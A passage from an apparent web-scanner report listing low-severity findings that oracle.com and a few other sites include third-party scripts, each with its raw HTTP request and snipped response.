Content-Length: 145091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.288. http://www.oracle.com/us/solutions/midsize/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/solutions/midsize/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/solutions/midsize/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41183804020059007,0:1)
Date: Tue, 06 Sep 2011 16:16:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 141597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.289. http://www.oracle.com/us/solutions/performance-scalability/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/solutions/performance-scalability/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/solutions/performance-scalability/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36011151567188407,0:1)
Date: Tue, 06 Sep 2011 16:16:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.290. http://www.oracle.com/us/solutions/solutions-165852.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/solutions/solutions-165852.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js
http://www.oracleimg.com/us/assets/mobilecompatibility.js

Request

GET /us/solutions/solutions-165852.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=1;ecid=36011228876600791,0:1)
Date: Tue, 06 Sep 2011 16:16:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/mobilecompatibility.js" type="text/javascript">
</script>
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.291. http://www.oracle.com/us/sun/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/sun/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/sun/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=242;ecid=35989165629261333,0:1)
Date: Tue, 06 Sep 2011 16:16:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 135893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.292. http://www.oracle.com/us/support/advanced-customer-services/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/advanced-customer-services/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/support/advanced-customer-services/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41102401504905518,0:1)
Date: Tue, 06 Sep 2011 16:16:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.293. http://www.oracle.com/us/support/contact-068555.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/contact-068555.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/support/contact-068555.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=40983856110748860,0:1)
Date: Tue, 06 Sep 2011 16:16:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 177425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.294. http://www.oracle.com/us/support/development-tools-080025.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/development-tools-080025.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/support/development-tools-080025.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41102547533795861,0:1)
Date: Tue, 06 Sep 2011 16:16:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.295. http://www.oracle.com/us/support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/support/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35974919222520039,0:1)
Date: Tue, 06 Sep 2011 16:16:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.296. http://www.oracle.com/us/support/lifetime-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/lifetime-support/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/support/lifetime-support/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41169372929955248,0:1)
Date: Tue, 06 Sep 2011 16:16:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.297. http://www.oracle.com/us/support/oracle-support-services-359636.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/oracle-support-services-359636.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/support/oracle-support-services-359636.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35762000514351306,0:1)
Date: Tue, 06 Sep 2011 16:16:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.298. http://www.oracle.com/us/support/policies/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/policies/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/support/policies/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41102757987196022,0:1)
Date: Tue, 06 Sep 2011 16:16:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.299. http://www.oracle.com/us/support/premier/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/premier/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/support/premier/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36011538114250090,0:1)
Date: Tue, 06 Sep 2011 16:16:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 125918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.300. http://www.oracle.com/us/support/support-integration/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/support-integration/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/support/support-integration/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36011692733074750,0:1)
Date: Tue, 06 Sep 2011 16:16:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.301. http://www.oracle.com/us/syndication/subscribe/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/syndication/subscribe/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/syndication/subscribe/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35763563882469969,0:1)
Date: Tue, 06 Sep 2011 16:16:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.302. http://www.oracle.com/us/technologies/cloud/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/technologies/cloud/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/technologies/cloud/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41166220423677124,0:1)
Date: Tue, 06 Sep 2011 16:16:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.303. http://www.oracle.com/us/technologies/java/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/technologies/java/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/technologies/java/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=225;ecid=35761918909971729,0:1)
Date: Tue, 06 Sep 2011 16:16:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.304. http://www.oracle.com/us/technologies/virtualization/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/technologies/virtualization/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/technologies/virtualization/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=35997532225678913,0:1)
Date: Tue, 06 Sep 2011 16:16:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 144444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.305. http://www.oracleimg.com/us/assets/metrics/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracleimg.com
Path:	/us/assets/metrics/crossdomain.xml

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12

Request

GET /us/assets/metrics/crossdomain.xml HTTP/1.1
Host: www.oracleimg.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=23;ecid=41045686459875265,0:1)
Content-Length: 101820
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:12:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

20.306. http://www.rayalab.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rayalab.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

20.307. http://www.rayalab.com/free_sample.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rayalab.com
Path:	/free_sample.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /free_sample.html HTTP/1.1
Host: www.rayalab.com
Proxy-Connection: keep-alive
Referer: http://www.rayalab.com/?gclid=CMuoq_OIiasCFRligwodfwxd4w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=258269193.1974267751.1315345538.1315345538.1315345538.1; __utmb=258269193.1.10.1315345538; __utmc=258269193; __utmz=258269193.1315345538.1.1.utmgclid=CMuoq_OIiasCFRligwodfwxd4w|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=Direct%20Beauty%20Product

Response

20.308. http://www.readwriteweb.com/%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.readwriteweb.com
Path:	/%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22

Issue detail

The response dynamically includes the following scripts from other domains:

http://js-kit.com/comments-count.js
http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js
http://s7.addthis.com/js/250/addthis_widget.js
http://static.fmpub.net/site/readwrite
http://static.fmpub.net/zone/101
